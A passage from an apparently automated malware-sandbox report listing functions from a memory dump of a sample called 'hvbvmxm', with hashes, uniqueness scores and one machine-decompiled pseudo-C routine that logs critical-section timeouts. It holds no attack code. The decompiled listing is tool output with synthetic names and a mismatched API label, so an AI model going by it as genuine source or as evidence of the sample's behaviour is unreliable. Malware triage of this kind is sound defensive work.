                                                  • Opcode Fuzzy Hash: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                                  • Instruction Fuzzy Hash: 3D90027224100402E251719944046060449E7D0381F91C066A042455CE86D58A66FAA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFB040 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                                  • Instruction ID: f3c8290fe1112d82a342a523a8e0fc6da7db73fbf0a2c8117b1b59587387fdae
                                                  • Opcode Fuzzy Hash: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                                  • Instruction Fuzzy Hash: B89002A2601140439650B19948044065455E7E1341391C175A0454568C86E88865E2A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF99D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                  • Instruction ID: aec79115d10e9f29738519f80e8b9a6866d442d6f00b0e29aa5afbb39a493aa5
                                                  • Opcode Fuzzy Hash: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                  • Instruction Fuzzy Hash: E39002A221100042E214619944047060485D7E1341F51C066A215455CCC5A98C71A165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9950 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                  • Instruction ID: 9f7130504737311f860d6fe042bcfaae4cab1c20afcb2dbc1997fe53db8d0800
                                                  • Opcode Fuzzy Hash: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                  • Instruction Fuzzy Hash: DF9002A220140403E250659948046070445D7D0342F51C065A206455DE8AA98C61B175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9A80 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                  • Instruction ID: 40e25c194c463a6d34ac6240e12ccfff647f7827ab26df814024db3cc07110ab
                                                  • Opcode Fuzzy Hash: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                  • Instruction Fuzzy Hash: 9B90026220144442E25062994804B0F4545D7E1342F91C06DA415655CCC9958865A761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9A10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                  • Instruction ID: cd24ce0a2d859d488f7286c22e6ed8d97b73ccb990e070c3ae511c639ad71a24
                                                  • Opcode Fuzzy Hash: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                  • Instruction Fuzzy Hash: 5590027220140402E210619948087470445D7D0342F51C065A516455DE86E5C8A1B571
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFA3B0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                  • Instruction ID: 3cdc3c48c5b0749e7d2c3f303ad117662c45c56e1d3a974a83615c23a46df001
                                                  • Opcode Fuzzy Hash: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                  • Instruction Fuzzy Hash: 7990027220144002E2507199844460B5445E7E0341F51C465E042555CC86958866E261
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9B00 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                                  • Instruction ID: b962c6b9c91677f59eabb441c46901add7741bb2ad88d548c5bcf5e74d541984
                                                  • Opcode Fuzzy Hash: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                                  • Instruction Fuzzy Hash: 3A90026224100802E250719984147070446D7D0741F51C065A002455CD86968975B6F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF95F0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                  • Instruction ID: 04620aa6bb27d2803001550eeb25a7b6fbdadabc51dcd26a2ee6263f5864c7d4
                                                  • Opcode Fuzzy Hash: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                  • Instruction Fuzzy Hash: 3990027220100802E214619948046860445D7D0341F51C065A602465DE96E588A1B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                  • Instruction ID: b8ce471e7c7a138346ab2ae922cfa3cf3e060195f39402d61ad55433f7c77e70
                                                  • Opcode Fuzzy Hash: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                  • Instruction Fuzzy Hash: E69002E2201140929610A2998404B0A4945D7E0341B51C06AE1054568CC5A58861E175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFAD30 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                  • Instruction ID: 8e6825e6d6d7f7841f06e553eb539a3830a05f6e9ebce233d1af554e9509b2c3
                                                  • Opcode Fuzzy Hash: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                  • Instruction Fuzzy Hash: D2900272A0500012E250719948146464446E7E0781B55C065A051455CC89D48A65A3E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9560 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                  • Instruction ID: 646f29aa433657a7f6b878a5bb0b9a24a25762606e4e418690446bbce2054d3c
                                                  • Opcode Fuzzy Hash: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                  • Instruction Fuzzy Hash: A7900266221000025255A599060450B0885E7D6391391C069F1416598CC6A18875A361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF96D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                  • Instruction ID: a37e0ac19c17650d967899adc70e5001e93e6495321535b97a5631664e3e0301
                                                  • Opcode Fuzzy Hash: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                  • Instruction Fuzzy Hash: A990027220100842E21061994404B460445D7E0341F51C06AA012465CD8695C861B561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9610 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                  • Instruction ID: c30fa2a5d7bca0bf62d3acebf9975c41ed408afd4442960619b60668b41d913b
                                                  • Opcode Fuzzy Hash: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                  • Instruction Fuzzy Hash: 9B90027260500802E260719944147460445D7D0341F51C065A002465CD87D58A65B6E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9650 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                  • Instruction ID: 1279ba6ebe872f0cb41666492246e9200b7eb4ee599fedda41a5a78d08eff8db
                                                  • Opcode Fuzzy Hash: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                  • Instruction Fuzzy Hash: 5790027220504842E25071994404A460455D7D0345F51C065A006469CD96A58D65F6A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9730 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0acf839a1bf6c2a0e027bda01caa432864400d61cab1016c64d6b9c51a25fc81
                                                  • Instruction ID: c731d0ac36add5569924dd98c56324c24c60b60f050a313278903dd9629f3b26
                                                  • Opcode Fuzzy Hash: 0acf839a1bf6c2a0e027bda01caa432864400d61cab1016c64d6b9c51a25fc81
                                                  • Instruction Fuzzy Hash: B290026260500402E250719954187060455D7D0341F51D065A002455CDC6D98A65B6E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFA710 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a939d81e4fd1cabc4e69cc16b17da37559529d47fdebcb83e61d45206b42e60
                                                  • Instruction ID: b0ef89177766c76499ee98f0d4d116d662485da101d51f72d532716484006b8a
                                                  • Opcode Fuzzy Hash: 8a939d81e4fd1cabc4e69cc16b17da37559529d47fdebcb83e61d45206b42e60
                                                  • Instruction Fuzzy Hash: 0890027230100052E610A6D95804A4A4545D7F0341B51D069A401455CC85D48871A161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9760 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4e18ec2f0c15f35cfbe453a931314575039e578d2f34dd9247ce4696241ba891
                                                  • Instruction ID: 0ec2c6188df7e1179102a9bcf94399cfbd2e6314c960f92fc2271eb9f0db3a05
                                                  • Opcode Fuzzy Hash: 4e18ec2f0c15f35cfbe453a931314575039e578d2f34dd9247ce4696241ba891
                                                  • Instruction Fuzzy Hash: C690027220100403E210619955087070445D7D0341F51D465A042455CDD6D68861B161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9770 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2cf3d7d244ed32073fbe97c3ccb86759d0e12853f3911487fa058b850e0e5100
                                                  • Instruction ID: 1ded18e532d4a1d35d656d21d58db86b3ada05586bd016116310bcd9b6db4fe5
                                                  • Opcode Fuzzy Hash: 2cf3d7d244ed32073fbe97c3ccb86759d0e12853f3911487fa058b850e0e5100
                                                  • Instruction Fuzzy Hash: 5290026220504442E21065995408A060445D7D0345F51D065A106459DDC6B58861F171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFA770 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 468828c39cb25db6bc350bfaa0522f6c4405895d078d3004fc98ecfb250469d6
                                                  • Instruction ID: 77f12ab8cb500c504d45ff28412b9c3d0df6ce4c0d199c1da5754de67c400e58
                                                  • Opcode Fuzzy Hash: 468828c39cb25db6bc350bfaa0522f6c4405895d078d3004fc98ecfb250469d6
                                                  • Instruction Fuzzy Hash: 4590027620504442E61065995804A870445D7D0345F51D465A042459CD86D48871F161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: fb8dc60d3c8ed19cd1cc89408650463b5fda6c01436fcdf4bfc276a0f888acbd
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B4FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E00B4FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                  0x00b4fdda
                                                  0x00b4fde2
                                                  0x00b4fde5
                                                  0x00b4fdec
                                                  0x00b4fdfa
                                                  0x00b4fdff
                                                  0x00b4fe0a
                                                  0x00b4fe0f
                                                  0x00b4fe17
                                                  0x00b4fe1e
                                                  0x00b4fe19
                                                  0x00b4fe19
                                                  0x00b4fe19
                                                  0x00b4fe20
                                                  0x00b4fe21
                                                  0x00b4fe22
                                                  0x00b4fe25
                                                  0x00b4fe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B4FDFA
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B4FE2B
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B4FE01
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                  • Instruction ID: 1f4e07b77d35b4ba5142125bbdeffbf0eaf4acf1dba3b77c0922343a4df4e460
                                                  • Opcode Fuzzy Hash: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                  • Instruction Fuzzy Hash: 71F0F632240605BFD6201A45DD02F33BB9AEB45730F240364F628565E2DA62FD30A7F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%